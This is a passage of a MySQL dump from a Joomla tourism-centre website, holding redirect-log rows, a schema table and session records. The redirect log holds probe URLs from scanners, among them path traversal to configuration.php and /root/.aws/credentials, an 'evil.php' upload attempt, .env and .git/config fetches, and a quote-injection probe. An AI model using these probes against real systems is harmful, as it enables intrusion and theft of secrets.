00:00:00'),(6000,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/lib/utils/common','','','',3,0,'2024-07-31 13:58:24','0000-00-00 00:00:00'),(6001,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/55-tytuvenu-festivalis/','','','',2,0,'2024-08-03 22:24:19','0000-00-00 00:00:00'),(6002,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf','','','',5,0,'2024-08-04 15:13:03','0000-00-00 00:00:00'),(6003,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2022.pdf','','','',5,0,'2024-08-04 15:22:59','0000-00-00 00:00:00'),(6004,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf','','','',5,0,'2024-08-04 15:26:24','0000-00-00 00:00:00'),(6005,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2021_m_veiklos_ataskaita.pdf','','','',4,0,'2024-08-04 15:39:50','0000-00-00 00:00:00'),(6006,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/apiecentra/veiklos_planas_2024.pdf','','','',4,0,'2024-08-04 15:46:34','0000-00-00 00:00:00'),(6007,'https://ww.infotytuvenai.lt/index.php/lt/adler32','','','',2,0,'2024-08-04 20:57:26','0000-00-00 00:00:00'),(6008,'https://ww.infotytuvenai.lt/index.php/lt/lib/deflate','','','',2,0,'2024-08-04 21:45:41','0000-00-00 00:00:00'),(6009,'https://ww.infotytuvenai.lt/index.php/lt/zlib/inflate','','','',2,0,'2024-08-04 23:26:44','0000-00-00 00:00:00'),(6010,'https://ww.infotytuvenai.lt/index.php/lt/zlib/messages','','','',2,0,'2024-08-04 23:35:48','0000-00-00 00:00:00'),(6011,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf','','','',2,0,'2024-08-05 01:25:43','0000-00-00 00:00:00'),(6012,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/undefined/','','','',2,0,'2024-08-05 02:26:43','0000-00-00 00:00:00'),(6013,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',2,0,'2024-08-05 06:31:53','0000-00-00 00:00:00'),(6014,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/55-tytuvenu-festivalis/','','','',2,0,'2024-08-05 08:25:45','0000-00-00 00:00:00'),(6015,'https://ww.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',2,0,'2024-08-05 13:55:52','0000-00-00 00:00:00'),(6016,'https://ww.infotytuvenai.lt/index.php/lt/component/content/article/58-trasos/','','','',2,0,'2024-08-05 18:16:10','0000-00-00 00:00:00'),(6017,'https://www.infotytuvenai.lt/index.php/lt//media/k2/assets/js/jquery-1.8.3.min.js','','','',2,0,'2024-08-12 20:29:47','0000-00-00 00:00:00'),(6018,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/js/helix.core.js','','','',2,0,'2024-08-12 20:29:48','0000-00-00 00:00:00'),(6019,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/css/bootstrap.min.css','','','',2,0,'2024-08-12 20:29:48','0000-00-00 00:00:00'),(6020,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/css/font-awesome.css','','','',2,0,'2024-08-12 20:29:49','0000-00-00 00:00:00'),(6021,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/css/mobile-menu.css','','','',2,0,'2024-08-12 20:29:49','0000-00-00 00:00:00'),(6022,'https://www.infotytuvenai.lt/index.php/lt//media/system/js/mootools-core.js','','','',2,0,'2024-08-12 20:29:50','0000-00-00 00:00:00'),(6023,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/css/bootstrap-responsive.min.css','','','',2,0,'2024-08-12 20:29:50','0000-00-00 00:00:00'),(6024,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/js/fixed-menu.js','','','',2,0,'2024-08-12 20:29:50','0000-00-00 00:00:00'),(6025,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/js/bootstrap.min.js','','','',2,0,'2024-08-12 20:29:51','0000-00-00 00:00:00'),(6026,'https://www.infotytuvenai.lt/index.php/lt//modules/mod_sp_smart_slider/tmpl/university/js/sp-smart-slider.js','','','',2,0,'2024-08-12 20:29:52','0000-00-00 00:00:00'),(6027,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/js/modernizr-2.6.2.min.js','','','',2,0,'2024-08-12 20:29:52','0000-00-00 00:00:00'),(6028,'https://www.infotytuvenai.lt/index.php/lt//media/system/js/core.js','','','',2,0,'2024-08-12 20:29:52','0000-00-00 00:00:00'),(6029,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/js/menu.js','','','',2,0,'2024-08-12 20:29:53','0000-00-00 00:00:00'),(6030,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/css/presets/preset3.css','','','',2,0,'2024-08-12 20:29:53','0000-00-00 00:00:00'),(6031,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/css/k2.css','','','',2,0,'2024-08-12 20:29:54','0000-00-00 00:00:00'),(6032,'https://www.infotytuvenai.lt/index.php/lt//media/system/js/caption.js','','','',2,0,'2024-08-12 20:29:54','0000-00-00 00:00:00'),(6033,'https://www.infotytuvenai.lt/index.php/lt//templates/tytuvenu_piligrimu_centras/css/template.css','','','',2,0,'2024-08-12 20:29:55','0000-00-00 00:00:00'),(6034,'https://www.infotytuvenai.lt/index.php/lt//modules/mod_sp_smart_slider/tmpl/university/css/university.slider.css','','','',2,0,'2024-08-12 20:29:55','0000-00-00 00:00:00'),(6035,'https://www.infotytuvenai.lt/index.php/lt//plugins/system/helix/js/jquery-noconflict.js','','','',2,0,'2024-08-12 20:29:56','0000-00-00 00:00:00'),(6036,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos&sa=U&ved=2ahUKEwi92Kr5kueHAxWYU0EAHeLFDIUQFnoECAwQAg&usg=AOvVaw0gllilLQ3kTiTiHHfGjJq4','','','',1,0,'2024-08-19 17:00:48','0000-00-00 00:00:00'),(6037,'https://infotytuvenai.lt/index.php/lt//.git/config','','','',1,0,'2024-08-22 22:45:04','0000-00-00 00:00:00'),(6038,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/56-tytuvenu-festivalis/','','','',3,0,'2024-09-16 12:28:00','0000-00-00 00:00:00'),(6039,'https://www.infotytuvenai.lt/index.php/lt/apie-','','','',2,0,'2024-09-25 05:51:43','0000-00-00 00:00:00'),(6040,'https://ww.infotytuvenai.lt/index.php/lt/utils/strings','','','',3,0,'2024-09-29 20:09:45','0000-00-00 00:00:00'),(6041,'https://ww.infotytuvenai.lt/index.php/lt/zlib/constants','','','',3,0,'2024-09-29 20:37:27','0000-00-00 00:00:00'),(6042,'https://ww.infotytuvenai.lt/index.php/lt/lib/zlib/constants','','','',3,0,'2024-09-29 22:28:13','0000-00-00 00:00:00'),(6043,'https://ww.infotytuvenai.lt/index.php/lt/lib/utils/common','','','',3,0,'2024-09-30 00:00:04','0000-00-00 00:00:00'),(6044,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos/robots.txt','','','',1,0,'2024-10-25 17:35:16','0000-00-00 00:00:00'),(6045,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/istatai/robots.txt','','','',1,0,'2024-10-25 17:35:19','0000-00-00 00:00:00'),(6046,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/kurtuvenu-regioninis-parkas/robots.txt','','','',1,0,'2024-10-25 17:35:20','0000-00-00 00:00:00'),(6047,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/4.jpg','','','',1,0,'2024-10-29 08:16:44','0000-00-00 00:00:00'),(6048,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/1.jpg','','','',1,0,'2024-10-29 08:16:46','0000-00-00 00:00:00'),(6049,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/3.jpg','','','',1,0,'2024-10-29 08:16:46','0000-00-00 00:00:00'),(6050,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/1.jpg','','','',1,0,'2024-10-29 08:16:47','0000-00-00 00:00:00'),(6051,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/2.jpg','','','',1,0,'2024-10-29 08:16:49','0000-00-00 00:00:00'),(6052,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/5.jpg','','','',1,0,'2024-11-03 21:26:30','0000-00-00 00:00:00'),(6053,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php','','','',20,0,'2024-11-12 04:26:48','0000-00-00 00:00:00'),(6054,'https://www.infotytuvenai.lt/index.php/lt/?option=com_macgallery&view=download&albumid=../../../configuration.php','','','',20,0,'2024-11-12 04:26:53','0000-00-00 00:00:00'),(6055,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../evil.php','','','',36,0,'2024-11-12 04:26:54','0000-00-00 00:00:00'),(6056,'https://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload','','','',17,0,'2024-11-20 13:05:20','0000-00-00 00:00:00'),(6057,'https://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw','','','',34,0,'2024-11-20 13:05:21','0000-00-00 00:00:00'),(6058,'https://www.infotytuvenai.lt/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',33,0,'2024-11-20 13:05:29','0000-00-00 00:00:00'),(6059,'https://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',17,0,'2024-11-20 13:05:31','0000-00-00 00:00:00'),(6060,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai/media/mj/b79ffd.js','','http://www.infotytuvenai.lt','',2,0,'2024-11-21 09:49:47','0000-00-00 00:00:00'),(6061,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai/media/mj/fbe7b2.js','','http://www.infotytuvenai.lt','',2,0,'2024-11-21 09:49:46','0000-00-00 00:00:00'),(6062,'https://www.infotytuvenai.lt/index.php/lt/images/stories/naujienos/gyvasis_paveldas/logo.jpg','','','',3,0,'2024-11-27 10:07:37','0000-00-00 00:00:00'),(6063,'https://195.12.167.109/index.php/lt/favicon.ico','','https://195.12.167.109','',61,0,'2024-11-28 19:38:42','0000-00-00 00:00:00'),(6064,'https://infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/','','','',1,0,'2024-11-29 18:34:28','0000-00-00 00:00:00'),(6065,'https://195.12.167.109/index.php/lt/sitemap.xml','','','',50,0,'2024-12-03 05:17:02','0000-00-00 00:00:00'),(6066,'https://195.12.167.109/index.php/lt/robots.txt','','','',50,0,'2024-12-03 05:17:03','0000-00-00 00:00:00'),(6067,'https://195.12.167.109/index.php?option=com_vreview&task=displayReply','','','',1,0,'2024-12-09 03:34:27','0000-00-00 00:00:00'),(6068,'https://195.12.167.109/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails','','','',1,0,'2024-12-09 03:34:27','0000-00-00 00:00:00'),(6069,'https://195.12.167.109/index.php/lt/.env','','','',1,0,'2024-12-09 06:04:49','0000-00-00 00:00:00'),(6070,'https://195.12.167.109/index.php/lt/.git/config','','','',1,0,'2024-12-09 06:04:49','0000-00-00 00:00:00'),(6071,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ZWR1a2FjaW','','','',2,0,'2025-01-07 07:22:24','0000-00-00 00:00:00'),(6072,'https://infotytuvenai.lt/index.php/lt/?format=feed&type=rss','','','',1,0,'2025-01-11 14:42:23','0000-00-00 00:00:00'),(6073,'https://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','https://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','',1,0,'2025-01-13 16:42:09','0000-00-00 00:00:00'),(6074,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/lib/inflate','','','',3,0,'2025-01-15 15:08:49','0000-00-00 00:00:00'),(6075,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/inftrees','','','',3,0,'2025-01-15 16:08:49','0000-00-00 00:00:00');
INSERT INTO `xyhmu_redirect_links` VALUES (6076,'https://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/projektai/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',1,0,'2025-01-27 02:48:29','0000-00-00 00:00:00'),(6077,'https://www.infotytuvenai.lt/index.php/lt/index.php/lt/?option=com_content&view=article&id=305','','','',1,0,'2025-01-27 11:32:10','0000-00-00 00:00:00'),(6078,'https://www.infotytuvenai.lt/index.php/lt/index.php/lt/?start=48','','','',1,0,'2025-01-31 09:24:29','0000-00-00 00:00:00'),(6079,'https://www.infotytuvenai.lt/index.php/lt/administrator','','','',2,0,'2025-02-02 13:08:49','0000-00-00 00:00:00'),(6080,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/templates/tytuvenu_piligrimu_centras/css/k2.css','','','',7,0,'2025-02-08 17:51:26','0000-00-00 00:00:00'),(6081,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/templates/tytuvenu_piligrimu_centras/css/bootstrap.min.css','','','',4,0,'2025-02-08 17:51:27','0000-00-00 00:00:00'),(6082,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/plugins/system/helix/css/bootstrap-responsive.min.css','','','',4,0,'2025-02-08 17:51:29','0000-00-00 00:00:00'),(6083,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/plugins/system/helix/css/font-awesome.css','','','',4,0,'2025-02-08 17:51:30','0000-00-00 00:00:00'),(6084,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/templates/tytuvenu_piligrimu_centras/css/mobile-menu.css','','','',4,0,'2025-02-08 17:51:31','0000-00-00 00:00:00'),(6085,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/templates/tytuvenu_piligrimu_centras/css/presets/preset3.css','','','',3,0,'2025-02-08 17:51:32','0000-00-00 00:00:00'),(6086,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/templates/tytuvenu_piligrimu_centras/css/template.css','','','',3,0,'2025-02-08 17:51:33','0000-00-00 00:00:00'),(6087,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt','','','',2,0,'2025-02-08 17:51:35','0000-00-00 00:00:00'),(6088,'http://195.12.167.107:443/home/webapps/infotytuvenai.lt/index.php/lt//home/webapps/infotytuvenai.lt/modules/mod_sp_smart_slider/tmpl/university/css/university.slider.css','','','',2,0,'2025-02-08 17:51:38','0000-00-00 00:00:00'),(6089,'https://www.infotytuvenai.lt/index.php/en/component/content/category/images/stories/2021_2025_m_starteginis_veiklos_planas.pdf','','','',5,0,'2025-02-13 15:20:15','0000-00-00 00:00:00'),(6090,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf','','','',3,0,'2025-02-17 20:18:21','0000-00-00 00:00:00'),(6091,'https://www.infotytuvenai.lt/index.php/lt//wp-content/plugins/linkpreview/db.php?u','','www.google.com','',1,0,'2025-02-18 06:24:17','0000-00-00 00:00:00'),(6092,'https://195.12.167.109/index.php/lt/ads.txt','','','',2,0,'2025-02-25 15:53:58','0000-00-00 00:00:00'),(6093,'https://195.12.167.109/index.php/lt/app-ads.txt','','','',2,0,'2025-02-25 15:53:59','0000-00-00 00:00:00'),(6094,'https://195.12.167.109/index.php/lt/sellers.json','','','',2,0,'2025-02-25 15:53:59','0000-00-00 00:00:00'),(6095,'https://www.infotytuvenai.lt/index.php/lt/images/stories/projektai/bpd.png','','','',1,0,'2025-03-01 23:45:04','0000-00-00 00:00:00'),(6096,'https://mail.infotytuvenai.lt/index.php/lt/favicon.ico','','https://mail.infotytuvenai.lt','',1,0,'2025-03-14 10:24:49','0000-00-00 00:00:00'),(6097,'https://webmail.infotytuvenai.lt/index.php/lt/favicon.ico','','https://webmail.infotytuvenai.lt','',1,0,'2025-03-14 21:09:19','0000-00-00 00:00:00'),(6098,'https://cpanel.infotytuvenai.lt/index.php/lt/favicon.ico','','https://cpanel.infotytuvenai.lt','',1,0,'2025-03-16 08:26:48','0000-00-00 00:00:00'),(6099,'https://m.infotytuvenai.lt/index.php/lt/favicon.ico','','https://m.infotytuvenai.lt','',1,0,'2025-03-17 12:10:47','0000-00-00 00:00:00'),(6100,'https://smtp.infotytuvenai.lt/index.php/lt/favicon.ico','','https://smtp.infotytuvenai.lt','',1,0,'2025-03-19 17:54:43','0000-00-00 00:00:00'),(6101,'https://webdisk.infotytuvenai.lt/index.php/lt/favicon.ico','','https://webdisk.infotytuvenai.lt','',1,0,'2025-03-20 18:28:52','0000-00-00 00:00:00'),(6102,'https://cpcontacts.infotytuvenai.lt/index.php/lt/favicon.ico','','https://cpcontacts.infotytuvenai.lt','',1,0,'2025-03-20 21:26:21','0000-00-00 00:00:00'),(6103,'https://www.infotytuvenai.lt/index.php/lt/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2023.pdf','','','',4,0,'2025-03-26 04:32:24','0000-00-00 00:00:00'),(6104,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/56-tytuvenu-festivalis/naujienos/','','','',3,0,'2025-03-30 02:22:44','0000-00-00 00:00:00'),(6105,'https://remote.infotytuvenai.lt/index.php/lt/favicon.ico','','https://remote.infotytuvenai.lt','',1,0,'2025-03-30 21:38:56','0000-00-00 00:00:00'),(6106,'https://website.infotytuvenai.lt/index.php/lt/favicon.ico','','http://box.jurga.lt','',1,0,'2025-03-31 02:11:21','0000-00-00 00:00:00'),(6107,'https://wbsubdomain.a.bb.ccc.dddd.infotytuvenai.lt/index.php/lt/favicon.ico','','https://wbsubdomain.a.bb.ccc.dddd.infotytuvenai.lt','',1,0,'2025-03-31 04:31:50','0000-00-00 00:00:00'),(6108,'https://a.bb.ccc.dddd.infotytuvenai.lt/index.php/lt/favicon.ico','','https://a.bb.ccc.dddd.infotytuvenai.lt','',1,0,'2025-03-31 04:52:47','0000-00-00 00:00:00'),(6109,'https://what.website.infotytuvenai.lt/index.php/lt/favicon.ico','','https://what.website.infotytuvenai.lt','',1,0,'2025-03-31 06:40:00','0000-00-00 00:00:00'),(6110,'https://ccc.dddd.infotytuvenai.lt/index.php/lt/favicon.ico','','https://ccc.dddd.infotytuvenai.lt','',1,0,'2025-03-31 11:36:19','0000-00-00 00:00:00'),(6111,'https://dddd.infotytuvenai.lt/index.php/lt/favicon.ico','','https://dddd.infotytuvenai.lt','',1,0,'2025-03-31 13:30:00','0000-00-00 00:00:00'),(6112,'https://195.12.167.109:443/index.php/display/status_zigbee','','','',2,0,'2025-04-13 17:09:59','0000-00-00 00:00:00'),(6113,'https://www.infotytuvenai.lt/index.php/lt/images/Lietuvos LEADER logotipas 1.jpg','','','',1,0,'2025-04-26 14:17:47','0000-00-00 00:00:00'),(6114,'https://www.infotytuvenai.lt/index.php/lt/images/logas be fono 1.png','','','',1,0,'2025-04-26 14:17:49','0000-00-00 00:00:00'),(6115,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&option=\'','','http://www.infotytuvenai.lt//index.php/lt/?option=com_content&option=%27','',1,0,'2025-05-08 00:48:50','0000-00-00 00:00:00'),(6116,'https://www.infotytuvenai.lt/index.php/lt/?option=\'','','http://www.infotytuvenai.lt//index.php/lt/?option=%27','',1,0,'2025-05-08 00:48:51','0000-00-00 00:00:00'),(6117,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/','','','',2,0,'2025-05-11 20:05:22','0000-00-00 00:00:00'),(6118,'https://www.infotytuvenai.lt/index.php/lt/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100','','','',1,0,'2025-05-14 06:49:06','0000-00-00 00:00:00'),(6119,'https://infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/','','','',1,0,'2025-05-21 02:34:23','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `xyhmu_redirect_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_schemas`
--

DROP TABLE IF EXISTS `xyhmu_schemas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_schemas` (
  `extension_id` int(11) NOT NULL,
  `version_id` varchar(20) NOT NULL,
  PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_schemas`
--

LOCK TABLES `xyhmu_schemas` WRITE;
/*!40000 ALTER TABLE `xyhmu_schemas` DISABLE KEYS */;
INSERT INTO `xyhmu_schemas` VALUES (700,'2.5.14'),(10072,'3.1.103');
/*!40000 ALTER TABLE `xyhmu_schemas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_session`
--

DROP TABLE IF EXISTS `xyhmu_session`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_session` (
  `session_id` varchar(200) NOT NULL DEFAULT '',
  `client_id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `guest` tinyint(4) unsigned DEFAULT '1',
  `time` varchar(14) DEFAULT '',
  `data` mediumtext,
  `userid` int(11) DEFAULT '0',
  `username` varchar(150) DEFAULT '',
  `usertype` varchar(50) DEFAULT '',
  PRIMARY KEY (`session_id`),
  KEY `whosonline` (`guest`,`usertype`),
  KEY `userid` (`userid`),
  KEY `time` (`time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_session`
--

LOCK TABLES `xyhmu_session` WRITE;
/*!40000 ALTER TABLE `xyhmu_session` DISABLE KEYS */;
INSERT INTO `xyhmu_session` VALUES ('13f8rc1c7009go95h4he3anq87',0,1,'1748590720','__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1748590719;s:18:\"session.timer.last\";i:1748590719;s:17:\"session.timer.now\";i:1748590719;s:22:\"session.client.browser\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:332:\"bY/NTsMwEIRfpfIJhJSfilK0vgHXwoEHQJvErU1tHHk3BKjKs7OpUy5wsvzNzu4MwhIOBDegOvPuWqP0E9yC2rw+5C/U1awHTPuhV5qgAjU99fVk2uLg+eUsNlBNSg0qGfT/YGqTMW+j69gq7TJenrE1bmf5l8ud3n0Yn5BdnGg9T7uAO7ONKSCT0o9CJXJwwfBnbzJYiRcTBqVR8h6OBJIWQ9fNBYm7e49EKvcXMXsJ1lMr2nM8df1b/Ci7JMOAp2G5s4lfznssV0W1uGhj6CVu441ePJuQBrJ3kcv1d+P14soy91CW4zgWlMVCDGUTubAc/KVs/wE=\";s:6:\"markup\";s:0:\"\";}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'',''),('24hhtig9kk2rtm4nghefdivur4',0,1,'1748591297','__default|a:7:{s:15:\"session.counter\";i:2;s:19:\"session.timer.start\";i:1748591296;s:18:\"session.timer.last\";i:1748591296;s:17:\"session.timer.now\";i:1748591297;s:22:\"session.client.browser\";s:111:\"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:456:\"nZBRT8IwFIX/StMnSAxsTAZ2TwSjJIAmYsKjKazbLrRr03aKEv677TaMGnkxezo799ze71AyIEdDYoJT9gpbhpNHMiZ4ubttJAmD1hdU7yuFk0bIDXDmRXjtoxmtuH05j2xI4J2QYM0o/+O32WrGyjdIbYETIFFcG4OzUTDIC+ud0bh2AoIVHBjX1IKsE+08CJqzTGpBrcEJJRE5Qv1K5BJl7kfDRu1UrQaNyiHDycl4VAGC2XflYB6cN3Q5qqnwyxy5G3F8VKRpW4yx6ZRTYzAZ+V6c2WR/tfKjL7fzUFjB8Q/69SX62SX6p+/0Nw7JrCqlpLZnzK9G7v7byMkBuyUVbW51xy7lB3BO+8NegDoLKKtDgiZlqiWkKAwSNO+iiVKcrdlmDrY/jEa9KEad+ex5ubhCHPYM3bPtXnbRtNBSsH4Yxb3Af2hZ14VWNKMa2qS74RM=\";s:6:\"markup\";s:6:\"mobile\";}}}s:4:\"user\";O:5:\"JUser\":25:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";N;s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":0:{}}s:14:\"\0*\0_authGroups\";a:1:{i:0;i:1;}s:14:\"\0*\0_authLevels\";a:2:{i:0;i:1;i:1;i:1;}s:15:\"\0*\0_authActions\";N;s:12:\"\0*\0_errorMsg\";N;s:10:\"\0*\0_errors\";a:0:{}s:3:\"aid\";i:0;}}',0,'',''),('4f6uq41hhlb5lu3agkq2bkteg5',0,1,'1748591352','__default|a:7:{s:15:\"session.counter\";i:1;s:19:\"session.timer.start\";i:1748591352;s:18:\"session.timer.last\";i:1748591352;s:17:\"session.timer.now\";i:1748591352;s:22:\"session.client.browser\";s:78:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0\";s:8:\"registry\";O:9:\"JRegistry\":1:{s:7:\"\0*\0data\";O:8:\"stdClass\":1:{s:12:\"mobilejoomla\";O:8:\"stdClass\":2:{s:5:\"cache\";s:340:\"bZDLTsMwEEV/xfIKNo0dpaEaL0Flw2PLrhpitzGJ68h2SqDqvzN5lA1IliyfO+O5dxByOEcogWtzspXh6hU2wJ8/HuYnSLHoDkPTd1xFEMDHSxZj0x77Nu2u4juIUZHAg8H2HxyrYMzx0+pUc2VnnF9xbeyhTr+c5nR2MG3AZP1I5VJtHR7M3geHKXL1QpQsO+tM+urMDNbUiwEdV0h+z5cI5Bad1kvAmPR9izHyOT+Jc2+EuzFVbJKfsv4NfqG/yEOPU/G4K/9t2xaz9UqwmzcpFdsa7QMq9mSP/cCGTbkrC8XCiTZQrMQtezRV47NcSEFHsq0NlGbIJpUG/AA=\";s:6:\"markup\";s:0:\"\";}}}s:4:\"user\";O:5:\"JUser\":29:{s:9:\"\0*\0isRoot\";b:0;s:2:\"id\";i:0;s:4:\"name\";s:0:\"\";s:8:\"username\";N;s:5:\"email\";N;s:8:\"password\";N;s:14:\"password_clear\";s:0:\"\";s:8:\"usertype\";N;s:5:\"block\";N;s:9:\"sendEmail\";i:0;s:12:\"registerDate\";N;s:13:\"lastvisitDate\";N;s:10:\"activation\";N;s:6:\"params\";N;s:6:\"groups\";a:0:{}s:5:\"guest\";i:1;s:13:\"lastResetTime\";N;s:10:\"resetCount\";N;s:10:\"\0*\0_params\";O:9:\"